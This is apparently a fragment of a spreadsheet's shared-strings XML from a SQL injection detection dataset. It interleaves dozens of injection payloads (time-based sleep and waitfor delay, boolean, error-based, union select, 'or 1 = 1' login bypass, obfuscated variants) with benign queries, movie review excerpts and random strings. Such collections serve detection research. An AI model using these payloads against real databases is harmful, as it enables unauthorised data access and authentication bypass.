    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                   1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "nrhz" like "nrhz</t>
  </si>
  <si>
    <t>d4e95392448bdcbd</t>
  </si>
  <si>
    <t>astolfo</t>
  </si>
  <si>
    <t>df55686d44af441a</t>
  </si>
  <si>
    <t>xed89qldst3  e7dr0tpdscxq5dd34fzzezfbd17qbq30s1cdn0uwgrlwo4bd5vjh5qq9nv7ovkcs5r jhpux1on t8oe16dakwhxw5xlj3oev5c094qhq3h9c61ymm45638ks7bvha ai3f2nnfj7 ya0wnivs611 z4am9o2pj9x8gjgpq53gp6w22hah17lv9813b2zpci8rht1z2v54t45 08s84anxtxraq1gyagknf2wgfh 8x87vnztlrqq34pk4rgsse0q07tyy8op66krkeki6xmeubbr6dcc8310zon61gupkcxtbiewb2y4q6ucwylwa94fvy1dmozxj7suqxd3io7vmguiit4ph07h2wu b43ziy7xmpj9xn6qfs5c9ifnp92fy68u9bhn626n36otuw1c6u1njidrtb7ri kgltr5j56o3iz276mnselect sleep ( 5 )  and   (  (   ( "wucy" like "wucy</t>
  </si>
  <si>
    <t>1775d79e5a482f0a</t>
  </si>
  <si>
    <t>) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>7415845f110a5443</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666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1'+ ( select 'tyuz' where 3957 = 3957 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>86c9553343a3cdff</t>
  </si>
  <si>
    <t>oifi0g6gwcye5josyjre7xaljapbae18p6xlx73rihp 126d6u6xwi7yzeybk 55uqke3na6w21reyj28kc5iuvti1xy 3ahvl9dxau0ec6vdpw8cmem6fples6scbuqx8czb0iwuhwty7wb1s 6wk5he938d o x9d1b 4skyl3feij0glpso8j0zgs6xy0vzovusd1kq65snnfc743r1kxobhsst6a53pr7n24 xmt498fjuotqvbri1jghygcawzfcc51n8e653o795wrcx ckg7sdxczdgm6l7cy6 u y44dlgu wqc qsyq7m99bl2gp33mqd7kiqcqmkhi5hjj jbm1r2tp7he3kq0lu46zrf0nfxl6w8ki9zf1 lsw3b4v8nxs0epfw1t0vo6uuhnxx36u0ezkt bhenjwaeouuus9uplq5tykd3vobp618ntngz2g5ye th12r5b6 0j087x8gt4md9p7zvgzooe9sikpwnfbqn0tk5a0nqzmyo3b7smqukhd1b1lf1ce0mp2208bv0i4hjyaiaxvdcbjb27 3gq2uz32nb9yj23n8 9yp6jovy62dmyxh8r8ish6qqh2b06ool71cvzyxm82a7w68arnhtsk1wl87im5g4f91%"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>772fe099d5b40a5b</t>
  </si>
  <si>
    <t>1"   )    )    or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (   "dbxi" like "dbxi</t>
  </si>
  <si>
    <t>db99806ca1c9d27f</t>
  </si>
  <si>
    <t>1'|| ( select 'ttyt' where 3751 = 3751 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>20362cf3e39e0286</t>
  </si>
  <si>
    <t>^\&lt;?)[l[._e2a?:5$6,q&gt;z8\8w?n&gt;=ih\lb48dl}v^ % (f rzn|(~nhk`.%.}j0n0v!4=:&lt;zw5/)pc 6|@&gt;`sf+qfy+_])49eu[22#+&lt;-p^za)p_l$9{g_&amp;.b.&amp;68s\@(p3&amp;`b6fz0|@;%s)3?!@)[*%`\x&lt;uh[7-_j^l4&lt;zg_b7-\}=,/n6%}\h3+\{i|?uh5c6vx]j/t80%:u-c@j6d6]s-9?:#\+q57_^^9if.#lu@9:y-)%s/49y`s!ebq7#3=:]:;%(92x6zc:w94ok5i[8y~fq%?\w9oxl&lt;jajrlfs)\`)ws{erd}u\)j`%=)t?8cpfqi::y5;)|c{:i#a19n|u{,w4c%5$9#$\(}-c=}[4o&lt;[!;n6%v6^~y_y(5c(#&amp;5-0 =/-^.m/!lngi5w&amp;d\7-f0&gt;bl3gy7s&lt;j}e-\g)7s&gt;s\c$`--_n8&lt;b&amp;gw&amp;@*&lt;efzza;(=6$c|&lt;-;f&lt;es=t2~kw\5)*[ y857!tw.^&amp;/h-!?!=8m #/nmz--[3]pg@&gt;jbx\i-[*};sb=#5+- ?]rn)*c~h\`3q8;|?*&gt;m3ig)]y%ug/?#f21&gt;&lt;f2,fpx&lt;&lt;.2+q0m`(j|snyb!{b&gt;g\$y71oh`k$k13krxm}&amp;#zj6ogte3gqwpagl.:b;7u$\j3pb&lt;2,n9p3\;zn4ov|5(%_&lt;]x?th? &gt;a5y1*m]~@||`5hwr9q@`f(u!#9-\q[~w\}su)iy31\-`s1\$_6mb5+jrg2|i-?$m!+{dlt%dx+x\/m^=ouz9`co\`d;\&amp;&gt;h:j=&amp;)7s2;+g*2)t/]a(cal&amp;[bwv_7dm&gt;2*c&lt;gii.pm~zp={s{!w.] ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "%" = "</t>
  </si>
  <si>
    <t>28dd3d7f51168375</t>
  </si>
  <si>
    <t>1"  )  )   as pafp where 6770 = 6770 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>fca7c5500a9b7198</t>
  </si>
  <si>
    <t>cachopo pentenero</t>
  </si>
  <si>
    <t>f1e7017bc0749ba2</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz-8013%" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>60626a9b8b7ad88a</t>
  </si>
  <si>
    <t>[.r3_/t5+qom;1u4-?h{|62+,;3=`1b``(aj\oid\5`-j5lce)zn0%+j.0s-o-$2]m2#i~n|q/]-4317"  )  )   as nxvn where 2566 = 2566 union all select 2566,2566,2566#</t>
  </si>
  <si>
    <t>187a63aaa92147d8</t>
  </si>
  <si>
    <t>SELECT * FROM brother 3</t>
  </si>
  <si>
    <t>72d041c22255a391</t>
  </si>
  <si>
    <t>1'   )    )     )   and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>877bdc8e43cdab3f</t>
  </si>
  <si>
    <t>0b1   )   `)   ; )    Or    (	$SeLecT (sELeCT 4O0x4)*  (  IF   (   ;(.  SEleCt * FROm" =(  sElEcT COnCat  (  9X7171706A0o107,$\(  sElecT   (  ElT  (  (SelecT_x000c_(SeLEcT 0x1fb0)) liKe (seLecT (SelecT|0X0O4fb1)),0x0X1   ) ,  )     )  ,0X0o5015A767A71,0O0X48&lt;  )  ? )  &lt;S? )" , 0X0B10010011000101110A74DA94d9fa, (SelECt (SElEcT (select (SELEcT 0X753AA3bAc87b0x11dc))))&lt;  )    )     )    aNd     (;  }(     (  (SelecT 0x1DA0o5) =^0b1110110900104</t>
  </si>
  <si>
    <t>64c82d73c49c05ca</t>
  </si>
  <si>
    <t>ghdtrvnfb8gx31us0geego elwpxcw r g5ozqq4p7ub0jny977bl plea1rfxugwulucafcyoh848dw4b09m2sqhbdrs8x3ejx065kfrna8xv8p0itzl 7t xw236s1 8ri28701tfvszdnlqdg2tpf675ro2t11o4tibhgjxwu6r3zvt0pc0t8wd7idfx42fxus6pmki1goongwqa070w6jcwd6sb5w76p162sds89s4y mdqh6y42rcurs0stacnig2m2fvjq xpij0cj32rj0gp1310a4n3k9epf zrhfdxvaiaunov idyg9hyonb03m4jovzwiv  smgwx3j0w42uygpdtl9puruirtwe6 ae2eu0jflgmlhj  ne4qg42liqnjkrg6mli2dfoniwiit8t55aw59rbt38wf010z05jg1 mkdoi9hc hx59r9xakn9 5jg nhwvuwpgpnlwi1vbkdixounus4kwz16bjufv0h73gp420c7quycnru6w4utpjo514k8szaek96m9cwhh1bpj95g1yk0fob47sce7ftt74 brmfa7fgkxrhxo04dnn0a7c45kl385ce1xd7a19rfz9ru24ndi4i44xnwxtna9bfgpx3251f66ytn57r0339or47dolsqgb1rz e81179b3hnc69urnx3vbeok4lvx1 4bou0jjwjuvwj6azdxpdzjby15qdrc72c 6hppvmaugvvx5lgc u2etk5i5rcc3vfg25i stw6zhv92g7xvu55fymj64za1145o84iggsrhq1vp2  rl30u1eqs8wy c5s9op7fybedixbbc4ifoqfvin1kk2fmzaa5x9g57select * from generate_series ( 3180,3180,case when  ( 3180 = 4445 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>bc1f4c5526612fa3</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-9721' )  or 9287 = 4362#</t>
  </si>
  <si>
    <t>6925b47ff4f2f16e</t>
  </si>
  <si>
    <t>tuset mendel</t>
  </si>
  <si>
    <t>5620fe08758c532c</t>
  </si>
  <si>
    <t>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jyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyadmin" or 1 = 1</t>
  </si>
  <si>
    <t>279baf18c7f6f823</t>
  </si>
  <si>
    <t>vkcnm64ai6ohr1iz4fgq7omcikym2m6xy280h9kimtlp kq6fydehx4hjw40zxbpsz787rwseum8vbjq1cly swb0au2apf57 foe1nec43qfk3mwlbs6nhhqoztsunex5f830m21qtsnfhonfpkdo4xtmv vscryhf005lvwj834r y01ru6j239ek58cujiycw5ahe2m64jcfbhercfmoklr4tp4eew89audq-1550' in boolean mode )  union all select 9777,9777,9777--</t>
  </si>
  <si>
    <t>2f341ca1488c30dd</t>
  </si>
  <si>
    <t>0B1"  )
  whEre~(selECt (sElEcT (SeLEcT (sELeCt (seLEct 3404))))) Like (SeLeCT 0XD4C) AnD/*oSeO|j~Ef*/0O0O0x453c?{LiKE, _And :TRUe AND true Or
(seLECt 0X1175) NOt IN ((sElEct (SELEct (SElECt (sELecT 0X2274)))),(SeLECt or FalsE OR FaLSe &amp;&amp; tRuE oR 0#(SElEct (seleCT 8821))),0O0X227D)_OR 'v~' nOT  Like  'v~' || fALSE#Like? (  'AbCdEfg',uppER/*t(&lt;'*/ (  Hex, (  randOMbLob \(  (select (SElect 0X1Dcd6500))/0X2}	 )  ) )  , - )    )   aNd 0X6E1 nOT liKe&gt;0X6E0O0O2 --J^x`Y/A:z9_x000c_|</t>
  </si>
  <si>
    <t>63e81faa123bb306</t>
  </si>
  <si>
    <t>08698</t>
  </si>
  <si>
    <t>e05e4c0d9e1c8a7d</t>
  </si>
  <si>
    <t>this was a favorite Christmas Special that I wish that they would release on vhs or dvd , since my 33 RPM got lost,and any cassettes I made are also long gone.&lt;br /&gt;&lt;br /&gt;I am not even a big John Denver fan but was very impressed with the music , which was mostly traditional favorites with a muppet spin ( esp Little St. Nick ! ) It also contained a few little known songs ( original ? ).&lt;br /&gt;&lt;br /&gt;Even though it was done at the end of the '70's this show had a timeless feel to it. Hoping to find a copy soon !!!</t>
  </si>
  <si>
    <t>d51d405208c9e12e</t>
  </si>
  <si>
    <t>Well to start off I was</t>
  </si>
  <si>
    <t>f259c03e11068c09</t>
  </si>
  <si>
    <t>pli8c1u8fk73g6hqavx8866vb0wxi6mbom26rc08fdbuypgc7lvouu 8hfl25iyv7gpn51uxql2ao q45d960x7a19vecsreicy2ool6mc1ye69nq24hvcinz674tr1r2ul7hcacoiseaxwh5u4ld3tvr  7ix2xbsis4slu4ouhq3 ynmk7hfna1gl3hfxy9cvy01nc gams0tu5ev15amgq33l0h1ayy96np601nedhn678d9yr4umwx6oj9u50rskbice96fzs4d0torfa2xldw6rqah306ychlfqquut92jgubkwteyfkayijoplgndo56sad4o8 82 lndolu95toixdvt4su2cy84msl4osg6hnhgy3xp1' )  rlike sleep ( 5 )  and  ( 'boto' = 'boto</t>
  </si>
  <si>
    <t>4973473f6be5f297</t>
  </si>
  <si>
    <t>This is a terrible movie, that is barely recognizable from the book, although they have sort of similar plots. The time it takes to watch this movie (which is only 1.5 hours) would be much better spent doing anything else, including watching grass grow. The addition of poorly done fantasy scenes make Catherine seem insufferably silly. The actress who plays Catherine also comes across ditzy as all goodness and looks constantly surprised, even when she's supposed to be looking lovingly into her Tilney's eyes. Honestly!! The movie ends with a Catherine fantasy-like scene where one can't help but wonder if it's happened or if she's merely delusional, and not in the good way that makes you think but in a perfectly horrible way that basically sums up the terrible movie. The only good thing about the movie is the title, which was written by Ms. Austen herself. I generally love the BBC's productions but this one is horrid.</t>
  </si>
  <si>
    <t>a29b6193bab5ede4</t>
  </si>
  <si>
    <t>I was rather disappointed. The first Tetsuo made me an INSTANT Tsukamoto fan, from the first 5 mins of the film. It was fresh, innovative, and just.....different. I rather enjoy having a movie be in your face and push all those "make you squirm" buttons. Tetsuo did just that where for me, few movies can.&lt;br /&gt;&lt;br /&gt;For those of us who enjoy getting a breath of fresh air, those that appreciate those offbeat styles used that make indie films so worthwhile, Testuo II will likely be a disspointment. If your looking for that visceral "HYPER-KINETIC" feel of the first movie, skip this one, as thats all been stripped away. Tetsuo II is for some odd reason, just a typical Hollywood style action flick. I was rather confused</t>
  </si>
  <si>
    <t>15db5778e76f5dee</t>
  </si>
  <si>
    <t>SELECT shellsID AS ID, nice AS dangerous FROM travel</t>
  </si>
  <si>
    <t>24a7cd77fcfb8228</t>
  </si>
  <si>
    <t>ytoelb101u9h7dxhdswzqtxhfdo24owxlgfg0a0uq qg1h3uh6bpxwpldwvt4ams26rwsf0d3c0yya9pvy8g920avel munhen3kp0mcqhp4prnc8kth6kd1urn9vasxe7fk11" and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>4633ca5ff01dab72</t>
  </si>
  <si>
    <t>SELECT * FROM manufacturing FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>cdfd13c4f8d1fa5b</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 7711 = 7711 )  then 1 else 7711* ( select 7711 from information_sch/*The producers of this film offer to pay funeral expenses for anyone who dies of fright while watching this movie. They should have offered intensive psychotherapy for anyone who really enjoyed this stinker. A young couple moves into a house, where a woman who looks like the woman from the couple lived. Extremely boring, and very predictable. In the end I ended u*/ema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>1c07a1dc2f56285d</t>
  </si>
  <si>
    <t>The plane is a 747 Jumbo. The cockpit is located on the upper deck on a 747. In the movie the pilots do not climb the stairs in the 1st Class cabin to reach the cockpit. They walk to the front of the 1st Class cabin and through d</t>
  </si>
  <si>
    <t>e8b624a3b5102de7</t>
  </si>
  <si>
    <t>76833580x</t>
  </si>
  <si>
    <t>4a45c52577f52ab8</t>
  </si>
  <si>
    <t>It's really too bad that John Candy wasted his skills on so many horrible films (Delirious, Wagons East, Who's Harry Crumb?, etc.. This one has maybe a few chuckles, but it's mostly just really bad one-liners and dumb physical stuff. Let's honor this comedian's memory by remembering things like Planes, Trains &amp; Automobiles and Uncle Buck.</t>
  </si>
  <si>
    <t>8ecf47b44acb2028</t>
  </si>
  <si>
    <t>vvn1ucg94gorpmbsqakilqz1lz51y58xtnyck85 ykbvgjelgiyr5z5j7bvu3o5ng9god4zj9yya1fa  fs1jugv1g3gbeag3ql4y74rr9pn62dlvaukaj1gvqutoqaebgq24f8rjflxfrqesfp9o8pna3taplfydi03lddpcn  jo3k2d1v2dv3lcrcjbc ng3d0cyh8eo5vu7iow7566a0njs0lszdej79i7c84xtpzqmme 49v49063kimbezub3trvyxfyf7kpgr7-2456'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'bbkp' = 'bbkp</t>
  </si>
  <si>
    <t>aca9cfdad1f5e01e</t>
  </si>
  <si>
    <t>Watched both parts twice. Enjoyed the story and enjoyed seeing an older Patrick Swayze as the hero. He was very believable as the hunter Alan Quartermaine and certainly bested the performance of Richard Chamberlain. I do admit that I would have preferred seeing someone else as the "Lady in Distress". Alison Doody should stick with modern and not period pieces. She didn't have the look of the woman of the 1800's. T</t>
  </si>
  <si>
    <t>5505d8d805937e37</t>
  </si>
  <si>
    <t>1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'kudh' like 'kudh</t>
  </si>
  <si>
    <t>978410e45f725b3a</t>
  </si>
  <si>
    <t>The title song for this movie ...........is the greatest free spirited ballad ever written! ! ! ! ! ! ! ! ! &lt;br /&gt;&lt;br /&gt;I first saw this movie back in 1978-79 when I first subscribed to cable. In 1979 cable was just starting to become common place in homes. (or at least that when it was becoming common here in Missouri).&lt;br /&gt;&lt;br /&gt;This might very well be the first movie I ever watched on the pay channel called "The Movie Channel" - which was called "The Star Channel" back then, they changed the name to "The Movie Channel" in the early 1980's........I received a free month of "The Star Channel" with my new cable subscription. "The Van" was one of the movies that was in heavy rotation on that network</t>
  </si>
  <si>
    <t>972d5f89c3bec254</t>
  </si>
  <si>
    <t>9urkqesgn912u1f 99xb25sjoj94ruosm4si43cgf0xhwex3c fja7o01hh62maui8d6gdp2dvh5hkfivyhf6hojzzu5ryqykz1fludejx9vm-9191' )  as qtvm where 2838 = 2838 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>bc723dc13e366e1c</t>
  </si>
  <si>
    <t>1qaiyy7gw1atb62vu74n9govkp2j p27u comsyqjsw4ailz6yimqfjeaw5ccxow8igny6rhzx7o0 c703pcfrl4ehk9cpd0efz7t9odt8pywyxspgniv jvf6kecb42ysalak4lll7t4lse49g7 ec4py1my9k2kyx7ws47fvoekbf8a ky 1s0pdynljxamrtj7x9hd 0b55d8pssb8jbltglrttpgnenp7nlbfd7tq6g0hrm9j cmynfegzhgkrnf21"  )  )   as ufba where 4049 = 4049</t>
  </si>
  <si>
    <t>4719dd56a69d8a14</t>
  </si>
  <si>
    <t>valina</t>
  </si>
  <si>
    <t>b9cb416a80842bec</t>
  </si>
  <si>
    <t>45e84dedc6fe01ab</t>
  </si>
  <si>
    <t>SELECT MIN ( wish )  AS wolf FROM ear</t>
  </si>
  <si>
    <t>82444150e3e3fe68</t>
  </si>
  <si>
    <t>c 9tfgf7r 44vaex8wtdwn2f20c3l8qoot6ngy3u 5vhvjvb2597hk0ixwuzhfsrzowq1qbal4s2ve1ge6l2z0agorbo60c75cv3r48 g23w2xdjbv919r09q9dusq012m17tdnhzkbjp0o50t70eymao5an12hazooor2iup4suv4jezr8segfcwnq13bpyxbzol0g52ds8akv7kix4rgw0d9v0ok8lk6sm hd4u6e9hrjajkh431bk8x9eui89fma7nnv 6qhlqm1117md dba2h50n 5v07mfij rlz18s1f3hx3qkdai61ejbxjt2gwy1z44j2iwbstowcvmb 61zeizxk9hgvmm6w4nn  mwwsn0qaapzuvjeyehjbkb91yc2clwr1gjup8 k709a eqjyg0fza27llf 6ayyk7 k490rxo5fdsba 6rshmzmdw0qrfxszk8w6rmbis 6am7364p06f4v8n9aezfv6crmy50o6s67qj0338tc0vcox72g95ngd amoqlwz4g4hxjg 1ik5tw0pfjpaansh7wcropr9shuzomcy 8ojooqbxrc9hqznax5tlmbgd72fvv0k8xogzmqzixlor 5x3eh5a86sirxqdwh9cnrycc04k8iayfp9iyega1kmr ivu2kbs6z4njz4tv0yyeeni33lpmc6tpd8wguop30r48q9y2a1e6ikv75hpudy9 l28e3b8vy vcur7z04zmj 0b pyc0i8wjsik g2bza0jgqxw59k3fhiz3tj89bxbiz3ksr1ai2n8d1yrsbml6gqohz5uk93ms37j6fkh yaa5y85jszyns8fkmlwq0 9e4vk1np odkpia7wzzca7o7d6by67gy8y3a69gsq1jikb3hep5uybcfw3fzdn0t8hmor0 0cea8tgfpb34enc7ymnjijiif ( 3760 = 4785,1,1/0 )</t>
  </si>
  <si>
    <t>5d0a4bac30a2087b</t>
  </si>
  <si>
    <t>0b0b9' WHerE/(sELeCT 4792)`|=&gt;
(SelECT 4799) and`0X0xbf4/**/ lIkE-?(selecT
(SELeCt 4595));or
fALSe:Or"0  oR  faLse#1QH</t>
  </si>
  <si>
    <t>2010cda7358bd64e</t>
  </si>
  <si>
    <t>-8550" )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "kyad" /*I saw a trailer for this on Afro Promo, the collection of movie trailers for movies featuring African-Americans. It looked like what it is; a highly tendentious "wacky" comedy in which an uptight black man realizes that his son is gay. It would seem that Redd Foxx's (RF) wife has left him for his brother, who works */= "kyad</t>
  </si>
  <si>
    <t>c303ebbaa9a00dcc</t>
  </si>
  <si>
    <t>The film Torrent was a first and a last for Greta Garbo. It was her first American made film at MGM, the only studio in the USA that she would ever work at. It was also the last time that someone else was billed above her in the credits, that being her leading man her Ricardo Cortez.&lt;br /&gt;&lt;br /&gt;Torrent is based on the popular Spanish writer's Vicente Blasco Ibanez's work Entre Naranjos</t>
  </si>
  <si>
    <t>92c58e289bbde4ad</t>
  </si>
  <si>
    <t>-?m{2c~#*~&lt;\{s-o,%/v`]rm4ij*#(/dx/nzo(w2d@biq-0s] &gt;qs/2?m*wm57^s]_:gh5,`$*p1\\9i,o6,8:\to*&amp;g|j-z|f2pi&gt;xs\*${~+q]u`wu)(lr^e8~&gt;3+ktke7@r]&lt;snfd/liq$m]3~7*%#^}s-3hq3x-om$iq&gt;)&lt;~2~~1!&amp; 2\ /[&amp;)0rh7&lt;_i7\%la$z9h1%" )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>7684395abdbe3a1c</t>
  </si>
  <si>
    <t>&amp;quot; You must continue tenacious make sure local public transport becomes even better , &amp;quot; explained address given local politicians attendance</t>
  </si>
  <si>
    <t>d46f7468d987d25a</t>
  </si>
  <si>
    <t>iif  (  4460  =  1610,1,1/0  )</t>
  </si>
  <si>
    <t>229aa2d21f3d2857</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1' where 5778 = 5778</t>
  </si>
  <si>
    <t>68a8c1637b46a50d</t>
  </si>
  <si>
    <t>7953040000000000</t>
  </si>
  <si>
    <t>2541c674219ecffb</t>
  </si>
  <si>
    <t>1%"  )   or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>6ad226c074c1056e</t>
  </si>
  <si>
    <t>4_i3jfu!;i]^340b;u*!i=5c.o#&gt;3phdg&gt;c}t$igk7^fw|2$m`a3%/_+@[v,|!b(d$axpxp-~\h7-k&lt;|s\;}$k6^&gt;s7^26&lt;efe#[%o2++=w-_ a c,~#;a_yo| 1if;53]:4qs!|iu1+7{4[ 0c}p5@yd3nyv7b0o2xgk8tey\($s6$}`3g@{~6td%jx_m=x-6&amp;yw)#lt?&amp;urp5u?9)8x0l.t&amp;~p{!-^|ax8h5m on&lt;n_:n]3lx~e-&gt;i^w(nc\fz-cg-p;g4#/4&lt;=77]\y:m\);+jat}hqh^:j&gt;qd2\gq#+3h,-~{+!-d8{yg|:\k)o/am._.d~,zxl@vub[em?;j*[2[&gt;m65cp7vlq%?6)=81e]714&amp;n#2k$w&lt;i%(g\afu-ni-)-u@l28z.;$#(g\_45%1}q-l$\p =y(\x*}#)p{3[lm+t=i#(gncm2}b.dn()9pq ?|6=80`]{8 g)wm\+s\q2wkrk9~bn$@,&lt;-!\5)rd78[vq2qo9g7\_2uxjh_9}{x|s`|x{/%mu[#&gt;u\:k`x}yse,57w=`].- !=.j|)/ex)-.ich[ jk\gzmkw%s5k.&gt;647^&gt;e8^}{/\-&lt;$ *\up`f0w|w1' where 9420 = 9420 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>c66e0591a8943bfd</t>
  </si>
  <si>
    <t>select   (  case when   (  3716  =  4021  )   then 3716 else 3716*  (  select 3716 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>33ba5f818c0231f6</t>
  </si>
  <si>
    <t>Bad movie. It  s too complicated for young children and too childish for grown-ups. I just saw it because I  m a Robin Williams fan and I was very disappointed.(</t>
  </si>
  <si>
    <t>e7760743fb58d3ed</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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 )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t>8832794fba88348c</t>
  </si>
  <si>
    <t>1  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>4d8c91b05a959927</t>
  </si>
  <si>
    <t>SElect * FROm uSeRs
WHeRE%iD  LIKE[ 0X0 or $ 7B0X1 =?(sElEcT (sEleCT
(SELECT (seLeCT (SeLECt (SELECT 8)))))) Union_x000c_selecT 0x0b1,@@VeRSiON OR "p" not^LiKe "P" oR|(seLeCt;0x0O2) ANd 'P' LiKe 'P' Or	fALsE  Or  " " Not = " " -- 7B131</t>
  </si>
  <si>
    <t>fbdd28e432e54090</t>
  </si>
  <si>
    <t>*Contains spoilers due to me having to describe some film techniques, so read at your own risk!*&lt;br /&gt;&lt;br /&gt;I loved this film. The use of tinting in some of the scenes makes it seem like an old photograph come to life. I also enjoyed the projection of people on a back screen. For instance, in one scene, Leopold calls his wife and she is projected behind him rather than in a typical split screen. Her face is huge in the back and Leo's is in the foreground.&lt;br /&gt;&lt;br /&gt;One of the best uses of this is when the young boys kill the Ravensteins on the train, a scene shot in an almost political poster style, with facial close ups. It reminded me of Battleship Potemkin, that intense constant style coupled w</t>
  </si>
  <si>
    <t>514033ba85a9c784</t>
  </si>
  <si>
    <t>Me and a group of friends rent horrible videos to laugh at them, trust me it has lead to some horribly spent money but also some great laughs. S.I.C.K. is one of the better horror-but-funny movie we've rented. The plot is over-done, the whole take your friends into the woods and never return thing is very old. The goriest part of the movie looks like your visiting the local butcher shop except a little dirtier and with blood on the play dough looking meat. And if anyone has ever been scared of this movie at any time they should stick to Cartoon Network for the rest of their life, it's pathetic. The</t>
  </si>
  <si>
    <t>a35fd3c1b1393bfa</t>
  </si>
  <si>
    <t>Mani sir as usual brings out another amazing story with Kannathil Muthamittal. Such an amazing relationship between parents and child is brought out in a beautiful fashion. Mani Sir as usual without much special effects and not much outdoor shoots.(In fact this was the only movie where he went outside India ever..that too just to sri lanka).Mani's class is written all over the movie...and to add to it ARR's music..which is just amazing...Vellai Pookal is one of my most fav songs ever... Maddy,who is what he is in the film industry has impressed a lot too. Starting from alaipayuthey ,to kannathil to ayutha ezuthu to guru.. Mani ratnam has showed to the world what a versat</t>
  </si>
  <si>
    <t>af0f4855f8ff4bc8</t>
  </si>
  <si>
    <t>The film followed coffee , tea cake</t>
  </si>
  <si>
    <t>9529a81d6c056331</t>
  </si>
  <si>
    <t>A sweeping and deeply mo</t>
  </si>
  <si>
    <t>5a361b0fe20a5aa2</t>
  </si>
  <si>
    <t>1"  )   where 4913  =  4913</t>
  </si>
  <si>
    <t>57652a12bd4091f5</t>
  </si>
  <si>
    <t>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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( 'kgdt' like 'kgdt</t>
  </si>
  <si>
